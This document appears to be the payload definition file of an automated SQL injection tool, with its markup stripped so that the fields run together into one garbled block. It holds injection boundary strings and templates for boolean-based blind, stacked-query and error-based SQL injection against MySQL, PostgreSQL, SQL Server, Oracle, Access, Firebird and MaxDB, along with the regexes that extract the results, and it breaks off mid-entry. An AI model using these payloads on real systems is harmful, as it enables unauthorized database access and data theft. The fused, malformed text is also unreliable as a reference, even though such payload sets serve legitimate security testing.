311,21)411,22')31,2,31,22'511,24"111,21) AND ([RANDNUM]=[RANDNUM]211,21)) AND (([RANDNUM]=[RANDNUM]311,21))) AND ((([RANDNUM]=[RANDNUM]101,2,31111,22') AND ('[RANDSTR]'='[RANDSTR]211,22')) AND (('[RANDSTR]'='[RANDSTR]311,22'))) AND ((('[RANDSTR]'='[RANDSTR]111,22' AND '[RANDSTR]'='[RANDSTR]211,23') AND ('[RANDSTR]' LIKE '[RANDSTR]311,23')) AND (('[RANDSTR]' LIKE '[RANDSTR]411,23'))) AND ((('[RANDSTR]' LIKE '[RANDSTR]211,23' AND '[RANDSTR]' LIKE '[RANDSTR]211,24") AND ("[RANDSTR]"="[RANDSTR]311,24")) AND (("[RANDSTR]"="[RANDSTR]411,24"))) AND ((("[RANDSTR]"="[RANDSTR]211,24" AND "[RANDSTR]"="[RANDSTR]311,25") AND ("[RANDSTR]" LIKE "[RANDSTR]411,25")) AND (("[RANDSTR]" LIKE "[RANDSTR]511,25"))) AND ((("[RANDSTR]" LIKE "[RANDSTR]311,25" AND "[RANDSTR]" LIKE "[RANDSTR]211,22%') AND ('%'='311,22%')) AND (('%'='411,22%'))) AND ((('%'='111,22%' AND '%'='511,22%00') AND ('[RANDSTR]'='[RANDSTR]411,22%00' AND '[RANDSTR]'='[RANDSTR]111,21-- [RANDSTR]511,22') WHERE [RANDNUM]=[RANDNUM]-- 511,22") WHERE [RANDNUM]=[RANDNUM]-- 411,21) WHERE [RANDNUM]=[RANDNUM]-- 411,22' WHERE [RANDNUM]=[RANDNUM]-- 511,24" WHERE [RANDNUM]=[RANDNUM]-- 411,21 WHERE [RANDNUM]=[RANDNUM]-- 511,22')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]-- 511,22")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]-- 511,21)) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]-- 411,22') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]-- 511,24") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]-- 411,21) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]-- 5112'||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM])||'5112'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM])||'5111'+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM])+'5112'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM])+'4112' IN BOOLEAN MODE)#AND boolean-based blind - WHERE or HAVING clause11111AND [INFERENCE]AND [RANDNUM]=[RANDNUM]AND [RANDNUM]=[RANDNUM1]AND boolean-based blind - WHERE or HAVING clause (MySQL comment)14111AND [INFERENCE]AND [RANDNUM]=[RANDNUM]#AND [RANDNUM]=[RANDNUM1]MySQLAND boolean-based blind - WHERE or HAVING clause (Generic comment)14111AND [INFERENCE]AND [RANDNUM]=[RANDNUM]-- AND [RANDNUM]=[RANDNUM1]OR boolean-based blind - WHERE or HAVING clause12312OR ([INFERENCE])OR ([RANDNUM]=[RANDNUM])OR ([RANDNUM]=[RANDNUM1])OR boolean-based blind - WHERE or HAVING clause (MySQL comment)13312OR ([INFERENCE])OR ([RANDNUM]=[RANDNUM])#OR ([RANDNUM]=[RANDNUM1])MySQLOR boolean-based blind - WHERE or HAVING clause (Generic comment)13312OR ([INFERENCE])OR ([RANDNUM]=[RANDNUM])-- OR ([RANDNUM]=[RANDNUM1])MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)1311,2,31RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END))RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END))MySQLGeneric boolean-based blind - Parameter replace (original value)1211,2,33(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)1311,2,33MAKE_SET([INFERENCE],[ORIGVALUE])MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE])MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE])MySQLMySQL boolean-based blind - Parameter replace (ELT - original value)1411,2,33ELT([INFERENCE],[ORIGVALUE])ELT([RANDNUM]=[RANDNUM],[ORIGVALUE])ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE])MySQLMySQL boolean-based blind - Parameter replace (bool*int - original value)1411,2,33([INFERENCE])*[ORIGVALUE]([RANDNUM]=[RANDNUM])*[ORIGVALUE]([RANDNUM]=[RANDNUM1])*[ORIGVALUE]MySQLMySQL >= 5.0 boolean-based blind - Parameter replace (original value)1311,2,33(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))MySQL>= 5.0MySQL < 5.0 boolean-based blind - Parameter replace (original value)1411,2,33(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))MySQLPostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)1321,2,33(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)PostgreSQLMicrosoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)1311,33(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))Microsoft SQL ServerSybaseWindowsOracle boolean-based blind - Parameter replace (original value)1311,33(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)OracleMicrosoft Access boolean-based blind - Parameter replace (original value)1311,33IIF([INFERENCE],[ORIGVALUE],1/0)IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)Microsoft AccessSAP MaxDB boolean-based blind - Parameter replace (original value)1311,33(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)SAP MaxDBGeneric boolean-based blind - GROUP BY and ORDER BY clauses1312,31,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END)),(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END)),(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END))Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)1412,31,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)),(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)),(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses1312,31,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)),(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)),(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))MySQL>= 5.0MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses1412,31,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)),(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)),(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))MySQLMicrosoft SQL Server/Sybase boolean-based blind - ORDER BY clause13131,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)),(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)),(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))Microsoft SQL ServerSybaseWindowsOracle boolean-based blind - GROUP BY and ORDER BY clauses1312,31,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL),(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL),(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)OracleMicrosoft Access boolean-based blind - GROUP BY and ORDER BY clauses1312,31,IIF([INFERENCE],[ORIGVALUE],1/0),IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0),IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)Microsoft AccessMicrosoft SQL Server/Sybase stacked conditional-error blind queries13001; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]--; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]Microsoft SQL ServerSybaseWindowsPostgreSQL stacked conditional-error blind queries13002; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END); SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)--; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)PostgreSQLMySQL >= 5.0 AND error-based - WHERE or HAVING clause21011AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]MySQL>= 5.0MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)22011AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]MySQL>= 5.1MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)23011AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]MySQL>= 5.1MySQL >= 4.1 AND error-based - WHERE or HAVING clause22011AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]MySQL>= 4.1PostgreSQL AND error-based - WHERE or HAVING clause21011AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]PostgreSQLMicrosoft SQL Server/Sybase AND error-based - WHERE or HAVING clause21011AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]Microsoft SQL ServerSybaseWindowsMicrosoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)22011AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))AND [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]Microsoft SQL ServerSybaseWindowsOracle AND error-based - WHERE or HAVING clause (XMLType)21011AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]OracleOracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)22011AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]Oracle>= 8.1.6Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)23011AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]OracleFirebird AND error-based - WHERE or HAVING clause22011AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]FirebirdMySQL >= 5.0 OR error-based - WHERE or HAVING clause22212OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]MySQL>= 5.0MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)23211OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]MySQL>= 5.1MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)24211OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]MySQL>= 5.1MySQL >= 4.1 OR error-based - WHERE or HAVING clause22212OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]MySQL>= 4.1MySQL OR error-based - WHERE or HAVING clause23212OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)#[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]MySQLPostgreSQL OR error-based - WHERE or HAVING clause22212OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]PostgreSQLMicrosoft SQL Server/Sybase OR error-based - WHERE or HAVING clause22212OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]Microsoft SQL ServerSybaseWindowsMicrosoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)23212OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))OR [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]Microsoft SQL ServerSybaseWindowsOracle OR error-based - WHERE or HAVING clause (XMLType)22212OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]OracleOracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)23212OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]Oracle>= 8.1.6Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)24212OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]OracleFirebird OR error-based - WHERE or HAVING clause23212OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]FirebirdMySQL >= 5.0 error-based - Parameter replace2301,2,33(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]MySQL>= 5.0MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)2301,2,33(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]MySQL>= 5.1MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)2401,2,33(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1]))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]MySQL>= 5.1PostgreSQL error-based - Parameter replace2301,2,33(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]PostgreSQLMicrosoft SQL Server/Sybase error-based - Parameter replace2301,33(CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))(CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]Microsoft SQL ServerSybaseWindowsMicrosoft SQL Server/Sybase error-based - Parameter replace (integer column)2401,33(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]Microsoft SQL ServerSybaseWindowsOracle error-based - Parameter replace2301,33(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]OracleFirebird error-based - Parameter replace2401,33(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))(SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]FirebirdMySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses2302,31,(SELECT 